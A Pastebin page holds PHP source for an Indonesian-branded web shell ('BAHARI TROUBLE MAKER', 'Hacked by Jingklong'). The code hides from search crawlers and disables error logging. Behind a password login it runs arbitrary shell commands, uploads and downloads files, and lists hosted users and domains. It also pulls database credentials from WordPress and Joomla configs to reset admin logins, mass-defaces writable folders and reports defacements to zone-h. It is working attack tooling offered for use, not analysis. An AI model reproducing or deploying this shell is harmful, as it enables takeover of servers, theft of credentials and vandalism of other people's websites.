SynthDeathcore

Untitled

Sep 16th, 2017
202
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 35.93 KB | None | 0 0
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @set_magic_quotes_runtime(0);
  6. @clearstatcache();
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10. @ini_set('output_buffering',0);
  11. @ini_set('display_errors', 0);
  12.  
  13. $auth_pass = "71e753a5f8d73de5571c840b0ae03c52"; // default: asu
  14. $color = "#00ff00";
  15. $default_action = 'FilesMan';
  16. $default_use_ajax = true;
  17. $default_charset = 'UTF-8';
  18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  19. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  20. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  21. header('HTTP/1.0 404 Not Found');
  22. exit;
  23. }
  24. }
  25.  
  26. function login_shell() {
  27. ?>
  28. <html>
  29. <head>
  30. <title>BTM</title>
  31. <style type="text/css">
  32. html {
  33. margin: 20px auto;
  34. background: #000000;
  35. color: green;
  36. text-align: center;
  37. }
  38. header {
  39. color: green;
  40. margin: 10px auto;
  41. }
  42. input[type=password] {
  43. width: 250px;
  44. height: 25px;
  45. color: red;
  46. background: #000000;
  47. border: 1px purple;
  48. padding: 5px;
  49. margin-left: 20px;
  50. text-align: center;
  51. }
  52. input[type=password1] {
  53. width: 250px;
  54. height: 25px;
  55. color: red;
  56. background: #000000;
  57. border: 1px ;
  58. padding: 5px;
  59. margin-left: 20px;
  60. text-align: center;
  61. }
  62. </style>
  63. </head>
  64. <center>
  65. <header>
  66. <html>
  67.  
  68.  
  69. <head>
  70. <link href='http://fonts.googleapis.com/css?family=Give+You+Glory' rel='stylesheet' type='text/css'>
  71. <link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
  72. <meta content='Hacked By Jingklong' name='description'/>
  73. <meta content='Hacked By Jingklong' name='keywords'/>
  74. <meta content='Hacked By Jingklong' name='Abstract'/>
  75. <style>
  76. img{border-width:0px}
  77. .shakeimage{position:relative}
  78. .button{margin-top:50px; padding:10px; background-color:red; color:#FFF;}
  79. h1 { font-size:48; margin-top:-20px;}
  80. </style>
  81.  
  82. <title> [!] hacked by Jingklong [!] </title>
  83. <link rel="SHORTCUT ICON" href="http://www.paper-machinery.com/flags/Indonesia.gif">
  84. </head>
  85. <body bgcolor="#000000"><br><center><img src="https://s28.postimg.org/7tfu3g2t9/alone_in_my_sadness_by_25clad35_d56fays.jpg" height="500" width="350"></center>
  86. <p></p><p></p><br><br><br><br><form method="post">
  87. <input type="password1" name="passssssssss">
  88. </form>
  89. <center><font color="lime" face="Give You Glory" size="5"><b>Karena sendirian itu menyakitkan</b></font>
  90. <embed src="http://www.youtube.com/v/lwNnWpRigGU&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
  91. </body>
  92.  
  93. <form method="post">
  94. <input type="password" name="pass">
  95. </form>
  96. <?php
  97. exit;
  98. }
  99. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  100. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  101. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  102. else
  103. login_shell();
  104. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  105. @ob_clean();
  106. $file = $_GET['file'];
  107. header('Content-Description: File Transfer');
  108. header('Content-Type: application/octet-stream');
  109. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  110. header('Expires: 0');
  111. header('Cache-Control: must-revalidate');
  112. header('Pragma: public');
  113. header('Content-Length: ' . filesize($file));
  114. readfile($file);
  115. exit;
  116. }
  117. ?>
  118. <html>
  119. <head>
  120. <title>BAHARI TROUBLE MAKER</title>
  121. <meta name='author' content='BAHARI TROUBLE MAKER'>
  122. <meta charset="UTF-8">
  123. <style type='text/css'>
  124. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  125. html {
  126. min-height: 100%;
  127. background-color: black;
  128. background-repeat: no-repeat;
  129. background-attachment: fixed;
  130. background-position: center;
  131. background-size: cover;
  132. color: white;
  133. font-family: 'Ubuntu';
  134. font-size: 13px;
  135. width: 100%;
  136. padding: 0px;
  137. -moz-border-radius: 5px;
  138. -webkit-border-radius: 5px;
  139. border-radius: 5px;
  140. }
  141. li {
  142. display: inline;
  143. margin: 5px;
  144. padding: 5px;
  145. -moz-border-radius: 5px;
  146. -webkit-border-radius: 5px;
  147. border-radius: 5px;
  148. }
  149. table, th, td {
  150. border-collapse:collapse;
  151. font-family: Tahoma, Geneva, sans-serif;
  152. background: transparent;
  153. font-family: 'Ubuntu';
  154. font-size: 13px;
  155. -moz-border-radius: 5px;
  156. -webkit-border-radius: 5px;
  157. border-radius: 5px;
  158. }
  159. .table_home, .th_home, .td_home {
  160. border: 1px solid #ffffff;
  161. -moz-border-radius: 5px;
  162. -webkit-border-radius: 5px;
  163. border-radius: 5px;
  164. }
  165. th {
  166. padding: 10px;
  167. }
  168. a {
  169. color: #ffffff;
  170. text-decoration: none;
  171. }
  172. b {
  173. padding: 1px;
  174. border: 1px solid white;
  175. color: green;
  176. text-decoration:
  177. none;color: white;
  178. font-size:14px;
  179. }
  180. a:hover {
  181. color: purple;
  182. text-decoration: underline;
  183. }
  184. tr:hover {
  185. background: #444;
  186. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  187. color: #FFFFFF; TEXT-DECORATION: none;
  188. }
  189.  
  190. input[type=text], input[type=password],input[type=submit] {
  191. background: transparent;
  192. overflow: hidden;
  193. color: #ffffff;
  194. border: 1px solid #ffffff;
  195. margin: 5px auto;
  196. padding-left: 5px;
  197. font-family: 'Ubuntu';
  198. font-size: 13px;
  199. -moz-border-radius: 5px;
  200. -webkit-border-radius: 5px;
  201. border-radius: 5px;
  202. }
  203. textarea {
  204. overflow: hidden;
  205. border: 1px solid #ffffff;
  206. width: 100%;
  207. height: 400px;
  208. padding-left: 5px;
  209. margin: 10px auto;
  210. resize: none;
  211. background: transparent;
  212. color: #ffffff;
  213. font-family: 'Ubuntu';
  214. font-size: 13px;
  215. -moz-border-radius: 5px;
  216. -webkit-border-radius: 5px;
  217. border-radius: 5px;
  218. }
  219. a:focus, input:focus, textarea:focus {
  220. outline: 0;
  221. border-color: rgba(82, 168, 236, 0.8);
  222. -webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  223. -moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  224. box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  225.  
  226. select {
  227. width: 152px;
  228. background: #000000;
  229. color: lime;
  230. border: 1px solid #ffffff;
  231. margin: 5px auto;
  232. padding-left: 5px;
  233. font-family: 'Ubuntu';
  234. font-size: 13px;
  235. -moz-border-radius: 5px;
  236. -webkit-border-radius: 5px;
  237. border-radius: 5px;
  238. }
  239. option:hover {
  240. background: lime;
  241. color: #000000;
  242. }
  243.  
  244. </style>
  245. </head>
  246. <?php
  247. function w($dir,$perm) {
  248. if(!is_writable($dir)) {
  249. return "<font color=red>".$perm."</font>";
  250. } else {
  251. return "<font color=lime>".$perm."</font>";
  252. }
  253. }
  254. function r($dir,$perm) {
  255. if(!is_readable($dir)) {
  256. return "<font color=red>".$perm."</font>";
  257. } else {
  258. return "<font color=lime>".$perm."</font>";
  259. }
  260. }
  261. function exe($cmd) {
  262. if(function_exists('system')) {
  263. @ob_start();
  264. @system($cmd);
  265. $buff = @ob_get_contents();
  266. @ob_end_clean();
  267. return $buff;
  268. } elseif(function_exists('exec')) {
  269. @exec($cmd,$results);
  270. $buff = "";
  271. foreach($results as $result) {
  272. $buff .= $result;
  273. } return $buff;
  274. } elseif(function_exists('passthru')) {
  275. @ob_start();
  276. @passthru($cmd);
  277. $buff = @ob_get_contents();
  278. @ob_end_clean();
  279. return $buff;
  280. } elseif(function_exists('shell_exec')) {
  281. $buff = @shell_exec($cmd);
  282. return $buff;
  283. }
  284. }
  285. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  286. $ar0=explode($marqueurDebutLien, $text);
  287. $ar1=explode($marqueurFinLien, $ar0[$i]);
  288. return trim($ar1[0]);
  289. }
  290. function perms($file){
  291. $perms = fileperms($file);
  292. if (($perms & 0xC000) == 0xC000) {
  293. // Socket
  294. $info = 's';
  295. } elseif (($perms & 0xA000) == 0xA000) {
  296. // Symbolic Link
  297. $info = 'l';
  298. } elseif (($perms & 0x8000) == 0x8000) {
  299. // Regular
  300. $info = '-';
  301. } elseif (($perms & 0x6000) == 0x6000) {
  302. // Block special
  303. $info = 'b';
  304. } elseif (($perms & 0x4000) == 0x4000) {
  305. // Directory
  306. $info = 'd';
  307. } elseif (($perms & 0x2000) == 0x2000) {
  308. // Character special
  309. $info = 'c';
  310. } elseif (($perms & 0x1000) == 0x1000) {
  311. // FIFO pipe
  312. $info = 'p';
  313. } else {
  314. // Unknown
  315. $info = 'u';
  316. }
  317. // Owner
  318. $info .= (($perms & 0x0100) ? 'r' : '-');
  319. $info .= (($perms & 0x0080) ? 'w' : '-');
  320. $info .= (($perms & 0x0040) ?
  321. (($perms & 0x0800) ? 's' : 'x' ) :
  322. (($perms & 0x0800) ? 'S' : '-'));
  323. // Group
  324. $info .= (($perms & 0x0020) ? 'r' : '-');
  325. $info .= (($perms & 0x0010) ? 'w' : '-');
  326. $info .= (($perms & 0x0008) ?
  327. (($perms & 0x0400) ? 's' : 'x' ) :
  328. (($perms & 0x0400) ? 'S' : '-'));
  329. // World
  330. $info .= (($perms & 0x0004) ? 'r' : '-');
  331. $info .= (($perms & 0x0002) ? 'w' : '-');
  332. $info .= (($perms & 0x0001) ?
  333. (($perms & 0x0200) ? 't' : 'x' ) :
  334. (($perms & 0x0200) ? 'T' : '-'));
  335. return $info;
  336. }
  337. function hdd($s) {
  338. if($s >= 1073741824)
  339. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  340. elseif($s >= 1048576)
  341. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  342. elseif($s >= 1024)
  343. return sprintf('%1.2f',$s / 1024 ) .' KB';
  344. else
  345. return $s .' B';
  346. }
  347. function ambilKata($param, $kata1, $kata2){
  348. if(strpos($param, $kata1) === FALSE) return FALSE;
  349. if(strpos($param, $kata2) === FALSE) return FALSE;
  350. $start = strpos($param, $kata1) + strlen($kata1);
  351. $end = strpos($param, $kata2, $start);
  352. $return = substr($param, $start, $end - $start);
  353. return $return;
  354. }
  355. function getsource($url) {
  356. $curl = curl_init($url);
  357. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  358. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  359. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  360. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  361. $content = curl_exec($curl);
  362. curl_close($curl);
  363. return $content;
  364. }
  365. function bing($dork) {
  366. $npage = 1;
  367. $npages = 30000;
  368. $allLinks = array();
  369. $lll = array();
  370. while($npage <= $npages) {
  371. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
  372. if($x) {
  373. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  374. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  375. $npage = $npage + 10;
  376. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  377. } else break;
  378. }
  379. $URLs = array();
  380. foreach($allLinks as $url){
  381. $exp = explode("/", $url);
  382. $URLs[] = $exp[2];
  383. }
  384. $array = array_filter($URLs);
  385. $array = array_unique($array);
  386. $sss = count(array_unique($array));
  387. foreach($array as $domain) {
  388. echo $domain."\n";
  389. }
  390. }
  391. function reverse($url) {
  392. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  393. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  394. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
  395. curl_setopt($ch, CURLOPT_HEADER, 0);
  396. curl_setopt($ch, CURLOPT_POST, 1);
  397. $resp = curl_exec($ch);
  398. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  399. $array = explode(",,", $resp);
  400. unset($array[0]);
  401. foreach($array as $lnk) {
  402. $lnk = "http://$lnk";
  403. $lnk = str_replace(",", "", $lnk);
  404. echo $lnk."\n";
  405. ob_flush();
  406. flush();
  407. }
  408. curl_close($ch);
  409. }
  410. if(get_magic_quotes_gpc()) {
  411. function idx_ss($array) {
  412. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  413. }
  414. $_POST = idx_ss($_POST);
  415. $_COOKIE = idx_ss($_COOKIE);
  416. }
  417.  
  418. if(isset($_GET['dir'])) {
  419. $dir = $_GET['dir'];
  420. chdir($dir);
  421. } else {
  422. $dir = getcwd();
  423. }
  424. $kernel = php_uname();
  425. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  426. $dir = str_replace("\\","/",$dir);
  427. $scdir = explode("/", $dir);
  428. $freespace = hdd(disk_free_space("/"));
  429. $total = hdd(disk_total_space("/"));
  430. $used = $total - $freespace;
  431. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  432. $ds = @ini_get("disable_functions");
  433. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>MYSQL</font>" : "<font color=red>MYSQL</font>";
  434. $curl = (function_exists('curl_version')) ? "<font color=lime>CURL</font>" : "<font color=red>CURL</font>";
  435. $wget = (exe('wget --help')) ? "<font color=lime>WGET</font>" : "<font color=red>WGET</font>";
  436. $perl = (exe('perl --help')) ? "<font color=lime>PERL</font>" : "<font color=red>PERL</font>";
  437. $python = (exe('python --help')) ? "<font color=lime>PYTHON</font>" : "<font color=red>PYTHON</font>";
  438. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  439. if(!function_exists('posix_getegid')) {
  440. $user = @get_current_user();
  441. $uid = @getmyuid();
  442. $gid = @getmygid();
  443. $group = "?";
  444. } else {
  445. $uid = @posix_getpwuid(posix_geteuid());
  446. $gid = @posix_getgrgid(posix_getegid());
  447. $user = $uid['name'];
  448. $uid = $uid['uid'];
  449. $group = $gid['name'];
  450. $gid = $gid['gid'];
  451. }
  452. echo "<font color=lime>".$kernel."</font><br>";
  453. echo "<font color=lime>".$user."</font> (".$uid.")-<font color=lime>".$group."</font> (".$gid.")| <font color=lime>".$ip."</font><br>";
  454. echo "<font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
  455. echo "<font color=lime>Safe Mode: $sm</font><br>";
  456. echo "<font color=lime>Disable Functions</font>: $show_ds<br>";
  457. echo "| $mysql | $perl| $python | $wget | $curl |<br>";
  458. echo "Current DIR: ";
  459. foreach($scdir as $c_dir => $cdir) {
  460. echo "<a href='?dir=";
  461. for($i = 0; $i <= $c_dir; $i++) {
  462. echo $scdir[$i];
  463. if($i != $c_dir) {
  464. echo "/";
  465. }
  466. }
  467. echo "'>$cdir</a>/";
  468. }
  469. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  470. echo "<hr>";
  471. echo "<center>";
  472. echo "<ul>";
  473. echo "<li> <a href='?'>Home</a> </li>";
  474. echo "<li> <a href='?dir=$dir&do=upload'>Upload</a> </li>";
  475. echo "<li> <a href='?dir=$dir&do=mass_deface'>Mass Deface and Zone-H</a> </li>";
  476. echo "<li> <a href='?dir=$dir&do=salto'>Domenyahh</a> </li>";
  477. echo "<li> <a href='?dir=$dir&do=saltokuy'>Usernyahh</a> </li>";
  478. echo "<li> <a style='color: red;' href='?logout=true'>Logout</a> </li>";
  479. echo "</ul>";
  480. echo "</center>";
  481. echo "<hr>";
  482. if($_GET['logout'] == true) {
  483. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  484. echo "<script>window.location='?';</script>";
  485.  
  486. }
  487. elseif($_GET['do'] == 'saltokuy') {
  488. if(isset($_POST['usernya'])) {
  489. $userr = $_POST['usernya'];
  490. echo "<center><br><form method='post' target='_blank' action='?dir=/home/$userr/backupwordpress'>
  491. <input type='submit' name='g' value='Saltoin' >
  492. </form>";
  493. } else {
  494. echo'<center><br><form method="post">
  495. <input type="text" name="usernya" size="50" height="10" placeholder="usernya" style="margin: 5px auto; padding-left: 5px;" required><br>
  496. <input type="submit" name="gg" value="Anuin" ></form>';
  497. }
  498.  
  499.  
  500. echo "<form method='post'>
  501. <input type='text' size='30' height='10' name='cmd' value='tar -zxvf '><input type='submit' name='do_cmd' value='X'>
  502. </form>";
  503. if($_POST['do_cmd']) {
  504. echo "<textarea name='script' style='width: 450px; height: 200px;'>".exe($_POST['cmd'])."</textarea>";
  505. }
  506. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  507. if($_POST['hajar']) {
  508. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  509. echo "username atau password harus lebih dari 6 karakter";
  510. } else {
  511. $user_baru = $_POST['user_baru'];
  512. $pass_baru = md5($_POST['pass_baru']);
  513. $conf = $_POST['config_dir'];
  514. $scan_conf = scandir($conf);
  515. foreach($scan_conf as $file_conf) {
  516. if(!is_file("$conf/$file_conf")) continue;
  517. $config = file_get_contents("$conf/$file_conf");
  518. if(preg_match("/JConfig|joomla/",$config)) {
  519. $dbhost = ambilkata($config,"host = '","'");
  520. $dbuser = ambilkata($config,"user = '","'");
  521. $dbpass = ambilkata($config,"password = '","'");
  522. $dbname = ambilkata($config,"db = '","'");
  523. $dbprefix = ambilkata($config,"dbprefix = '","'");
  524. $prefix = $dbprefix."users";
  525. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  526. $db = mysql_select_db($dbname);
  527. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  528. $result = mysql_fetch_array($q);
  529. $id = $result['id'];
  530. $site = ambilkata($config,"sitename = '","'");
  531. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  532. echo "Config => ".$file_conf."<br>";
  533. echo "CMS => Joomla<br>";
  534. if($site == '') {
  535. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  536. } else {
  537. echo "Sitename => $site<br>";
  538. }
  539. if(!$update OR !$conn OR !$db) {
  540. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  541. } else {
  542. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  543. }
  544. mysql_close($conn);
  545. } elseif(preg_match("/WordPress/",$config)) {
  546. $dbhost = ambilkata($config,"DB_HOST', '","'");
  547. $dbuser = ambilkata($config,"DB_USER', '","'");
  548. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  549. $dbname = ambilkata($config,"DB_NAME', '","'");
  550. $dbprefix = ambilkata($config,"table_prefix = '","'");
  551. $prefix = $dbprefix."users";
  552. $option = $dbprefix."options";
  553. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  554. $db = mysql_select_db($dbname);
  555. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  556. $result = mysql_fetch_array($q);
  557. $id = $result[ID];
  558. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  559. $result2 = mysql_fetch_array($q2);
  560. $target = $result2[option_value];
  561. if($target == '') {
  562. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  563. } else {
  564. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  565. }
  566. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  567. echo "Config => ".$file_conf."<br>";
  568. echo "CMS => Wordpress<br>";
  569. echo $url_target;
  570. if(!$update OR !$conn OR !$db) {
  571. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  572. } else {
  573. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  574. }
  575. mysql_close($conn);
  576. }
  577. }
  578. }
  579. } else {
  580. echo "
  581.  
  582. <form method='post' target='_blank'>
  583. <input type='text' size='70' name='config_dir' value='$dir'><br>
  584. <input type='text' name='user_baru' value='asuasu69' placeholder='user_baru'><br>
  585. <input type='text' name='pass_baru' value='asuasu69' placeholder='pass_baru'><br>
  586. <input type='submit' name='hajar' value='Sikat' style='width: 215px;'>
  587. </form>
  588. ";
  589.  
  590.  
  591. echo "<center>";
  592. echo "<table align='center'><tr><th> USER </table></th></tr>";
  593. echo "<textarea name='script' style='width: 450px; height: 200px;'>";
  594. $domains = scandir("/var/named");
  595. $count=1;
  596. $dc = 0;
  597. $list = scandir("/var/named");
  598. foreach($list as $domain){
  599. if(strpos($domain,".db")){
  600. $domain = str_replace('.db','',$domain);
  601. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  602. $dirz = '/home/'.$owner['name'].'/backupwordpress';
  603.  
  604. if (is_readable($dirz)) {
  605. echo "".$owner['name']."\n";
  606. $dc++;
  607. }
  608.  
  609. }
  610. }
  611. echo"</textarea>";
  612. $total = $dc;
  613. echo '<br><div class="result">Total Anu Found = '.$total.'</h3><br />';
  614. echo '</center>';
  615. }
  616. }
  617. elseif($_GET['do'] == 'salto') {
  618. $all = array();
  619. // domain finder.
  620. $d0mains = file('/etc/named.conf');
  621. $domains = scandir("/var/named");
  622.  
  623. if($domains or $d0mains){
  624. $count = 0;
  625. if($domains){
  626. echo "<center><h1>Count Domains on user</h1></center><br><br>";
  627. $cur = array();
  628. foreach($domains as $domain){
  629. if(strpos($domain, '.db')){
  630. $dom = str_replace('.db', '', $domain);
  631. $own = posix_getpwuid(fileowner("/etc/valiases/$dom"));
  632. $user = $own['name'];
  633. $all[$user][] = $dom;
  634. //echo "$user: $dom<br/>";
  635. }
  636. }
  637. echo "";
  638. }
  639. elseif($d0mains){
  640.  
  641. $mck = array();
  642. foreach($d0mains as $domain){
  643. preg_match_all('#zone "(.*)"#',$domain,$dom);
  644. flush();
  645. if(strlen(trim($domain[1][0])) >2){
  646. $mck[] = $dom[1][0];
  647. }
  648. }
  649.  
  650. $mck = array_unique($mck);
  651. foreach($mck as $dom){
  652. $own = posix_getpwuid(fileowner("/etc/valiases/$dom"));
  653. $user = $own['name'];
  654. $all[$user][] = $dom;
  655. //echo "$user: $dom<br/>";
  656. }
  657. echo "";
  658. }
  659. }
  660. foreach($all as $user => $domain){
  661. echo "<center>User <font color='red'>$user</font> has <font color='red'>".count($domain)."</font> Domains below :<br></center>";
  662. echo "<center>---------------<br>";
  663. foreach($domain as $v){
  664. echo "<center><a href='http://$v/' target='_blank'>http://$v<a><br></center>";
  665. }
  666. echo "<center>---------------";
  667. echo "<br><br>";
  668. }
  669.  
  670. }
  671.  
  672. elseif($_GET['do'] == 'upload') {
  673. echo "<center>";
  674. if($_POST['upload']) {
  675. if($_POST['tipe_upload'] == 'biasa') {
  676. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  677. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  678. } else {
  679. $act = "<font color=red>failed to upload file</font>";
  680. }
  681. } else {
  682. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  683. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  684. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  685. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  686. $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  687. } else {
  688. $act = "<font color=red>failed to upload file</font>";
  689. }
  690. } else {
  691. $act = "<font color=red>failed to upload file</font>";
  692. }
  693. }
  694. }
  695. echo "Upload File:
  696. <form method='post' enctype='multipart/form-data'>
  697. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  698. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  699. <input type='file' name='ix_file'>
  700. <input type='submit' value='upload' name='upload'>
  701. </form>";
  702. echo $act;
  703. echo "</center>";
  704. } elseif($_GET['do'] == 'cmd') {
  705. echo "<form method='post'>
  706. <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
  707. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  708. </form>";
  709. if($_POST['do_cmd']) {
  710. echo "<pre>".exe($_POST['cmd'])."</pre>";
  711. }
  712. } elseif($_GET['do'] == 'mass_deface') {
  713. function sabun_massal($dir,$namafile,$isi_script) {
  714. if(is_writable($dir)) {
  715. $dira = scandir($dir);
  716. foreach($dira as $dirb) {
  717. $dirc = "$dir/$dirb";
  718. $lokasi = $dirc.'/'.$namafile;
  719. if($dirb === '.') {
  720. file_put_contents($lokasi, $isi_script);
  721. } elseif($dirb === '..') {
  722. file_put_contents($lokasi, $isi_script);
  723. } else {
  724. if(is_dir($dirc)) {
  725. if(is_writable($dirc)) {
  726. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  727. file_put_contents($lokasi, $isi_script);
  728. $idx = sabun_massal($dirc,$namafile,$isi_script);
  729. }
  730. }
  731. }
  732. }
  733. }
  734. }
  735. function sabun_biasa($dir,$namafile,$isi_script) {
  736. if(is_writable($dir)) {
  737. $dira = scandir($dir);
  738. foreach($dira as $dirb) {
  739. $dirc = "$dir/$dirb";
  740. $lokasi = $dirc.'/'.$namafile;
  741. if($dirb === '.') {
  742. file_put_contents($lokasi, $isi_script);
  743. } elseif($dirb === '..') {
  744. file_put_contents($lokasi, $isi_script);
  745. } else {
  746. if(is_dir($dirc)) {
  747. if(is_writable($dirc)) {
  748. echo "<td><a href='http://$dirb/$namafile' target='_blank'><font color=red>http://$dirb/$namafile</a></font><br>";
  749. file_put_contents($lokasi, $isi_script);
  750. }
  751. }
  752. }
  753. }
  754. }
  755. }
  756. if($_POST['start']) {
  757. if($_POST['tipe_sabun'] == 'mahal') {
  758. echo "<div style='margin: 5px auto; padding: 5px'>";
  759. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  760. echo "</div>";
  761. } elseif($_POST['tipe_sabun'] == 'murah') {
  762. echo "<div style='margin: 5px auto; padding: 5px'>";
  763. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  764. echo "</div>";
  765. }
  766. } else {
  767. echo "<center>";
  768. echo "<form method='post'>
  769. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  770. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  771. <font style='text-decoration: underline;'>Folder:</font><br>
  772. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  773. <font style='text-decoration: underline;'>Filename:</font><br>
  774. <input type='text' name='d_file' value='asu.htm' style='width: 450px;' height='10'><br>
  775. <font style='text-decoration: underline;'>Index File:</font><br>
  776. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by Jingklong</textarea><br>
  777. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  778. </form></center>";
  779. }
  780. if($_POST['submit']) {
  781. $domain = explode("\r\n", $_POST['url']);
  782. $nick = $_POST['nick'];
  783. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  784. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  785. function zoneh($url,$nick) {
  786. $ch = curl_init("http://www.zone-h.com/notify/single");
  787. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  788. curl_setopt($ch, CURLOPT_POST, true);
  789. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  790. return curl_exec($ch);
  791. curl_close($ch);
  792. }
  793. foreach($domain as $url) {
  794. $zoneh = zoneh($url,$nick);
  795. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  796. echo "$url -> <font color=lime>OK</font><br>";
  797. } else {
  798. echo "$url -> <font color=red>ERROR</font><br>";
  799. }
  800. }
  801. } else {
  802. echo "<center><form method='post'>
  803. <font style='text-decoration: underline;'>Zone-H Poster :</font><br>
  804. <u>Defacer</u>: <br>
  805. <input type='text' name='nick' size='50' value='Jingklong'><br>
  806. <u>Domains</u>: <br>
  807. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  808. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  809. </form>";
  810. }
  811. echo "</center>";
  812. } elseif($_GET['act'] == 'newfile') {
  813. if($_POST['new_save_file']) {
  814. $newfile = htmlspecialchars($_POST['newfile']);
